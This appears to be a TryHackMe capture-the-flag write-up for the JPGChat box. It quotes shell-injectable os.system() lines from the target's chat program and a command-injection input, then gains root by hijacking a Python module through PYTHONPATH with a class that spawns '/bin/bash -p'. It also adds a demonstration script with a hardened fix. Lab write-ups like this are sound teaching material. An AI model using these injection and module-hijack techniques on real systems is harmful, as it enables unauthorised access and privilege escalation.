Tryhackme – JPGChat

Initial foothold

After running our normal scan, `scanit $(boxip)`, we get two ports open.

The custom chat program looks interesting, let’s netcat to it.

We get presented with a usage prompt. Let’s try the [REPORT] function first.

Hmm, interesting, Mozzie-jpg. Let's search for that Git user to see the code, as mentioned.
We find this repo: https://github.com/Mozzie-jpg/JPChat. In there is a single Python file with two interesting lines of code.

Both look injectable.

    os.system("bash -c 'echo %s > /opt/jpchat/logs/report.txt'" % your_name)
    os.system("bash -c 'echo %s >> /opt/jpchat/logs/report.txt'" % report_text)

I sent a random string for good measure, then a command, then an echo to complete the line as it is in the code. This might not be necessary, but I do it just in case so I don't break anything.

Hi;id;echo test

Here I tried one command on the name and another on the report, both worked.
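The two os.system() calls above, as an added example that is not JPChat's own code: it rebuilds the command strings without running them, tokenises what bash -c would receive to show the ';' turning one echo into three separate commands, and puts a hardened version beside it that writes the log file directly with no shell. The report text is a constructed sample.

```python
import shlex
import tempfile
from pathlib import Path

# Constructed sample input: the name payload from the writeup plus a made-up report text.
SAMPLE_NAME = "Hi;id;echo test"
SAMPLE_TEXT = "Report;whoami;echo test"
LOG = "/opt/jpchat/logs/report.txt"

def vulnerable_report_commands(your_name, report_text):
    """Build (but do not run) the two strings JPChat hands to os.system()."""
    return [
        "bash -c 'echo %s > %s'" % (your_name, LOG),
        "bash -c 'echo %s >> %s'" % (report_text, LOG),
    ]

def bash_c_body(command):
    """Return what bash -c receives: the text between the single quotes."""
    prefix = "bash -c '"
    if not (command.startswith(prefix) and command.endswith("'")):
        raise ValueError("not a bash -c command string")
    return command[len(prefix):-1]

def shell_commands(body):
    """Tokenise like a shell and split at ';' to count the commands bash would run.
    A safe input yields exactly one command."""
    lexer = shlex.shlex(body, punctuation_chars=True)
    commands, current = [], []
    for tok in lexer:
        if tok == ";":
            commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands

def write_report(log_path, your_name, report_text):
    """Hardened equivalent: write the file directly, no shell involved,
    so ';' or '$' in the input are just characters in the log line."""
    with log_path.open("w", encoding="utf-8") as fh:
        fh.write(your_name + "\n")
        fh.write(report_text + "\n")

def demo_hardened(your_name, report_text):
    """Write to a temporary log and return its content for inspection."""
    log_path = Path(tempfile.mkdtemp()) / "report.txt"
    write_report(log_path, your_name, report_text)
    return log_path.read_text(encoding="utf-8")
```

A name without metacharacters yields a single command from shell_commands(), which is the check a reviewer would run over the original strings to see why the redirection no longer protects anything.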

User

We got command execution. Let’s get a shell.

Shell popped. We can grab user.txt flag.

Root

`sudo -l` is the first thing I try.

We can do something with the PYTHONPATH environment variable. Interesting.

Python module hijacking is explained here.

Creating a minimal class named compare:

    class compare:
        def Str(self, x, y):
            import os
            os.system('/bin/bash -p')

We should get a root terminal when a string is compared.

So let's try:

Bingo.